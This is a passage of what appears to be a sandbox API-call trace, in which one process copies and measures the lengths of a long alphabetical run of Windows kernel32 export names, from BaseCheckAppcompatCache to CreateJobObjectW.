lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.239] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.239] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.239] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.239] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.240] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.240] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.240] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.240] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.240] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.240] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.240] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.240] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.240] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.240] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.240] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.240] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.240] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.240] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.240] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.240] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.240] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.240] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.240] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.241] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.241] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.241] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.241] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.241] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.241] lstrlenA (lpString="BEEP") returned 4 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.241] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.241] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.241] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.241] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.241] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.241] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.241] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.241] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.241] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.241] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.241] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.241] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.241] lstrlenA (lpString="CANCELIO") returned 8 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.242] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.242] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.242] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.242] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.242] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.242] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.242] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.242] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.242] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.242] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.242] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.242] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.242] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.242] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.242] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.242] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.242] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.242] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.242] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.243] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.243] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.243] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.243] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.243] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.243] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.243] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.243] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.243] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.243] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.243] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.243] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.243] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.243] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.243] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.243] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.243] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.243] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.243] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.243] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.244] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.244] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.244] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.244] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.244] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.244] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.244] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.244] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.244] lstrlenA (lpString="COPYFILEA") returned 9 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.244] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.244] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.244] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.244] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.244] lstrlenA (lpString="COPYFILEW") returned 9 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.244] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.244] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.244] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.244] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.244] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.245] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.245] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.245] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.245] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.245] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.245] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.245] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.245] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.245] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.245] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.245] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.245] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.245] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.245] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.245] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.245] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.245] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.245] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.246] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.246] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.246] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.246] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.246] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.246] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.246] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.246] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.246] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.246] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.246] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | 